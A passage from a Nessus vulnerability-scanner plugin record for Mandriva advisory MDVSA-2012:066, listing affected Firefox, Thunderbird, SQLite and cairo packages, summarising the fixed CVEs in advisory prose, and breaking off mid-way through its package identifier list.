"p-cpe:/a:mandriva:linux:mozilla-thunderbird-is", "p-cpe:/a:mandriva:linux:libsqlite3-devel", "p-cpe:/a:mandriva:linux:firefox-ca", "p-cpe:/a:mandriva:linux:firefox-bg", "p-cpe:/a:mandriva:linux:firefox-et", "p-cpe:/a:mandriva:linux:firefox-lg", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ro", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-uk", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pl", "p-cpe:/a:mandriva:linux:firefox-or", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-it", "p-cpe:/a:mandriva:linux:firefox-si", "p-cpe:/a:mandriva:linux:firefox-pt_PT", "p-cpe:/a:mandriva:linux:firefox-ast", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ko", "p-cpe:/a:mandriva:linux:lib64xulrunner10.0.4", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-lightning", "p-cpe:/a:mandriva:linux:libcairo2", "p-cpe:/a:mandriva:linux:firefox-cy", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-he", "p-cpe:/a:mandriva:linux:firefox-ko", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-zh_CN", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-ja", "p-cpe:/a:mandriva:linux:firefox-nb_NO", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-de", "p-cpe:/a:mandriva:linux:firefox-uk", "p-cpe:/a:mandriva:linux:firefox-hy", "p-cpe:/a:mandriva:linux:firefox-kn", "p-cpe:/a:mandriva:linux:firefox-devel", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-nb_NO", "p-cpe:/a:mandriva:linux:mozilla-thunderbird", "p-cpe:/a:mandriva:linux:firefox-mai", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fr", "p-cpe:/a:mandriva:linux:lib64cairo-devel", "p-cpe:/a:mandriva:linux:firefox-ar", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-si", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-vi", "p-cpe:/a:mandriva:linux:firefox-nn_NO", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-hu", "p-cpe:/a:mandriva:linux:firefox-pt_BR", "p-cpe:/a:mandriva:linux:libcairo-static-devel", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-be", "p-cpe:/a:mandriva:linux:lib64sqlite3-static-devel", "p-cpe:/a:mandriva:linux:firefox-da", "p-cpe:/a:mandriva:linux:firefox-hu", "p-cpe:/a:mandriva:linux:firefox-sr", "p-cpe:/a:mandriva:linux:lib64xulrunner12.0", "p-cpe:/a:mandriva:linux:firefox-pl", "p-cpe:/a:mandriva:linux:firefox-es_CL", "p-cpe:/a:mandriva:linux:firefox-gu_IN", "p-cpe:/a:mandriva:linux:firefox-cs", "p-cpe:/a:mandriva:linux:firefox-ta_LK", "p-cpe:/a:mandriva:linux:firefox-ml", "p-cpe:/a:mandriva:linux:firefox-hi", "p-cpe:/a:mandriva:linux:firefox-es_MX", "p-cpe:/a:mandriva:linux:firefox-th", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-et", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nl", "p-cpe:/a:mandriva:linux:firefox-hr", "p-cpe:/a:mandriva:linux:firefox-en_GB", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt_BR", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-nn_NO", "p-cpe:/a:mandriva:linux:firefox-mr", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-zh_TW", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ar", "p-cpe:/a:mandriva:linux:libcairo-devel", "p-cpe:/a:mandriva:linux:firefox-he", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ca", "p-cpe:/a:mandriva:linux:libsqlite3-static-devel", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-sk", "p-cpe:/a:mandriva:linux:mozilla-thunderbird-cs"], "id": "MANDRIVA_MDVSA-2012-066.NASL", "href": "https://www.tenable.com/plugins/nessus/58921", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2012:066. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58921);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-3062\", \"CVE-2012-0467\", \"CVE-2012-0468\", \"CVE-2012-0469\", \"CVE-2012-0470\", \"CVE-2012-0471\", \"CVE-2012-0472\", \"CVE-2012-0473\", \"CVE-2012-0474\", \"CVE-2012-0477\", \"CVE-2012-0478\", \"CVE-2012-0479\");\n script_xref(name:\"MDVSA\", value:\"2012:066\");\n\n script_name(english:\"Mandriva Linux Security Advisory : mozilla (MDVSA-2012:066)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security issues were identified and fixed in mozilla firefox and\nthunderbird :\n\nMozilla developers identified and fixed several memory safety bugs in\nthe browser engine used in Firefox and other Mozilla-based products.\nSome of these bugs showed evidence of memory corruption under certain\ncircumstances, and we presume that with enough effort at least some of\nthese could be exploited to run arbitrary code (CVE-2012-0468,\nCVE-2012-0467).\n\nUsing the Address Sanitizer tool, security researcher Aki Helin from\nOUSPG found that IDBKeyRange of indexedDB remains in the XPConnect\nhashtable instead of being unlinked before being destroyed. When it is\ndestroyed, this causes a use-after-free, which is potentially\nexploitable (CVE-2012-0469).\n\nUsing the Address Sanitizer tool, security researcher Atte Kettunen\nfrom OUSPG found a heap corruption in gfxImageSurface which allows for\ninvalid frees and possible remote code execution. This happens due to\nfloat error, resulting from graphics values being passed through\ndifferent number systems (CVE-2012-0470).\n\nAnne van Kesteren of Opera Software found a multi-octet encoding issue\nwhere certain octets will destroy the following octets in the\nprocessing of some multibyte character sets. This can leave users\nvulnerable to cross-site scripting (XSS) attacks on maliciously\ncrafted web pages (CVE-2012-0471).\n\nSecurity research firm iDefense reported that researcher wushi of\nteam509 discovered a memory corruption on Windows Vista and Windows 7\nsystems with hardware acceleration disabled or using incompatible\nvideo drivers. This is created by using cairo-dwrite to attempt to\nrender fonts on an unsupported code path. This corruption causes a\npotentially exploitable crash on affected systems (CVE-2012-0472).\n\nMozilla community member Matias Juntunen discovered an error in\nWebGLBuffer where FindMaxElementInSubArray receives wrong template\narguments from FindMaxUshortElement. This bug causes maximum index to\nbe computed incorrectly within WebGL.drawElements, allowing the\nreading of illegal video memory (CVE-2012-0473).\n\nSecurity researchers Jordi Chancel and Eddy Bordi reported that they\ncould short-circuit page loads to show the address of a different site\nthan what is loaded in the window in the addressbar. Security\nresearcher Chris McGowen independently reported the same flaw, and\nfurther demonstrated that this could lead to loading scripts from the\nattacker's site, leaving users vulnerable to cross-site scripting\n(XSS) attacks (CVE-2012-0474).\n\nSecurity researcher Masato Kinugawa found that during the decoding of\nISO-2022-KR and ISO-2022-CN character sets, characters near 1024 bytes\nare treated incorrectly, either doubling or deleting bytes. On certain\npages it might be possible for an attacker to pad the output of the\npage such that these errors fall in the right place to affect the\nstructure of the page, allowing for cross-site script (XSS) injection\n(CVE-2012-0477).\n\nMozilla community member Ms2ger found an image rendering issue with\nWebGL when texImage2D uses use JSVAL_TO_OBJECT on arbitrary objects.\nThis can lead to a crash on a maliciously crafted web page. While\nthere is no evidence that this is directly exploitable, there is a\npossibility of remote code execution (CVE-2012-0478).\n\nMateusz Jurczyk of the Google Security Team discovered an off-by-one\nerror in the OpenType Sanitizer using the Address Sanitizer tool. This\ncan lead to an out-of-bounds read and execution of an uninitialized\nfunction pointer during parsing and possible remote code execution\n(CVE-2011-3062).\n\nSecurity researcher Jeroen van der Gun reported that if RSS or Atom\nXML invalid content is loaded over HTTPS, the addressbar updates to\ndisplay the new location of the loaded resource, including SSL\nindicators, while the main window still displays the previously loaded\ncontent. This allows for phishing attacks where a malicious page can\nspoof the identify of another seemingly secure site (CVE-2012-0479).\n\nThe mozilla firefox and thunderbird packages has been upgraded to the\nlatest respective versions which is unaffected by these security\nflaws.\n\nAdditionally the SQLite packages has been upgraded to the 3.7.11\nversion and the cairo packages has been patched to work with firefox\nand thunderbird 12.0 for Mandriva Linux 2011.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2012/mfsa2012-20.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2012/mfsa2012-22.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2012/mfsa2012-23.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2012/mfsa2012-24.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2012/mfsa2012-25.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2012/mfsa2012-26.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2012/mfsa2012-27.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2012/mfsa2012-29.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2012/mfsa2012-30.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2012/mfsa2012-31.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2012/mfsa2012-33.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-af\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ast\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-be\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-bn_BD\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-bn_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-bs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-cy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-en_GB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-en_ZA\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-eo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-es_AR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-es_CL\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-es_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-es_MX\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-et\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-fa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-fy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ga_IE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-gl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-gu_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-he\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-hi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-hr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-hy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-is\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-kk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-kn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ku\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-lg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-lv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-mai\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-mk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-mr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-nb_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-nn_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-nso\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-or\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pa_IN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-pt_PT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-si\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-sv_SE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ta\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-ta_LK\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-te\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-th\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:firefox-zu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64cairo-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64cairo-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64cairo2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64sqlite3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64sqlite3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64sqlite3_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xulrunner10.0.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64xulrunner12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libcairo-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libcairo-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libcairo2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsqlite3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsqlite3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libsqlite3_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxulrunner10.0.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libxulrunner12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-be\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-bg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-bn_BD\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-br\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-da\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-en_GB\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ca\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-cs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-de\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-es\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-sv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-enigmail-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_AR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-es_ES\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-et\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-eu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-fi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-fr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-fy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ga\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-gl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-he\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-hu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-id\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-is\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-it\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-lightning\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-lt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-nb_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-nl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-nn_NO\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-pl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_BR\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-pt_PT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ro\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ru\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-si\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-sk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-sl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-sq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-sv_SE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-ta_LK\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-tr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-uk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-vi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:mozilla-thunderbird-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:nsinstall\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:sqlite3-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n script_set_attribute(attribute:\"cpe\", 